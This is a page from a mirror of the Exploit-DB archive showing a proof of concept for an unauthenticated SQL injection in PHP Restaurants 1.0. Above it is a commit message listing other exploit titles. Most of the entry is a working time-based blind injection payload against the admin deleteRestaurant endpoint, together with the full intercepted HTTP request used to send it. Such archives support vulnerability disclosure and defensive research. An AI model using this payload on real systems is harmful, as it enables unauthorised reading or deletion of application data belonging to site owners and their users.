bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/50699.txt
Offensive Security ad453a2c73 DB: 2022-02-03 
17 changes to exploits/shellcodes

CONTPAQi(R) AdminPAQ 14.0.0 - Unquoted Service Path
Mozilla Firefox 67 - Array.pop JIT Type Confusion
Fetch Softworks Fetch FTP Client 5.8 - Remote CPU Consumption (Denial of Service)
Ametys CMS v4.4.1 - Cross Site Scripting (XSS)
uBidAuction v2.0.1 - 'Multiple' Cross Site Scripting (XSS)
Chamilo LMS 1.11.14 - Account Takeover
Wordpress Plugin Download Monitor WordPress V 4.4.4 - SQL Injection (Authenticated)
WordPress Plugin Domain Check 1.0.16 - Reflected Cross-Site Scripting (XSS) (Authenticated)
Wordpress Plugin 404 to 301 2.0.2 - SQL-Injection (Authenticated)
PHP Restaurants 1.0 - SQLi (Unauthenticated)
Moodle 3.11.4 - SQL Injection
Huawei DG8045 Router 1.0 - Credential Disclosure
PHP Unit 4.8.28 - Remote Code Execution (RCE) (Unauthenticated)
WordPress Plugin Contact Form Check Tester 1.0.2 - Broken Access Control
WordPress Plugin Product Slider for WooCommerce 1.13.21 - Cross Site Scripting (XSS)
WordPress Plugin Post Grid 2.1.1 - Cross Site Scripting (XSS)
WordPress Plugin Learnpress 4.1.4.1 - Arbitrary Image Renaming
2022-02-03 05:01:57 +00:00

33 lines
No EOL
1.3 KiB
Text
Raw Blame History

# Exploit Title: PHP Restaurants 1.0 - SQLi (Unauthenticated)
# Google Dork: None
# Date: 01/29/2022
# Exploit Author: Nefrit ID
# Vendor Homepage: https://github.com/jcwebhole
# Software Link: https://github.com/jcwebhole/php_restaurants
# Version: 1.0
# Tested on: Kali Linux & Windows 10
*SQL injection is a code injection technique used to attack
data-driven applications, in which malicious SQL statements are
inserted into an entry field for execution (e.g. to dump the database
contents to the attacker). wikipedia*
===Start===
Exploit Url = http://localhost/php_restaurants-master/admin/functions.php?f=deleteRestaurant&id=1337
AND (SELECT 3952 FROM (SELECT(SLEEP(5)))XMSid)
Burpsuite Proxy Intercept
GET /php_restaurants-master/admin/functions.php?f=deleteRestaurant&id=1337
HTTP/1.1
Host: web_server_ip
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69
Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://web_server_ip/php_restaurants-master/admin/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: uid=1
Connection: close
Reference in a new issue View git blame Copy permalink